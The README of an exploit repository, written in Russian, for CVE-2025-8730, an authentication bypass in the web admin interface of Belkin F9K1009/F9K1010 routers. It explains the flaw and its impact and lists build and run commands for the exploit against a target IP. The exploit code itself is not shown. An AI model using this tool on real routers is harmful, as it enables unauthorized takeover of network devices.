
Эксплойт, демонстрирующий уязвимость обхода аутентификации в веб-интерфейсе маршрутизаторов Belkin F9K1009 и F9K1010.
Автор : Byte Reaper
Этот репозиторий содержит эксплойт для CVE‑2025‑8730, критической уязвимости обхода аутентификации, затрагивающей веб-интерфейс маршрутизаторов Belkin F9K1009 и F9K1010.
Недостаток заключается в логике проверки сессий в файле /login.htm, где неправильно обработанные куки или специально созданные запросы позволяют злоумышленникам обойти проверки входа и получить полный доступ к административному интерфейсу без действительных учетных данных.
Эта уязвимость позволяет удаленным злоумышленникам (имеющим доступ к сети):
Получать доступ к конфиденциальным данным конфигурации
Изменять настройки маршрутизатора
Развертывать дополнительные полезные нагрузки для сохранения доступа или перемещения по сети
Запись NVD: https://nvd.nist.gov/vuln/detail/CVE-2025-8730
gcc exploit.c argparse.c -o CVE-2025-8730 -lcurl
./CVE-2025-8730 -i 192.168.1.1
Verbose Mode :
./CVE-2025-8730 -i 192.168.1.1 -v -c [cookie file]
Full URl :
./CVE-2025-8730 -f http://<IP>/<LOGIN_FILE>
Sleep (second):
./CVE-2025-8730 -i 192.168.1.1 -s 1
Number Request (For loop), example 10 Request POST :
./CVE-2025-8730 -i 192.168.1.1 -k 10 -s 1 -v
Лицензия :
MIT License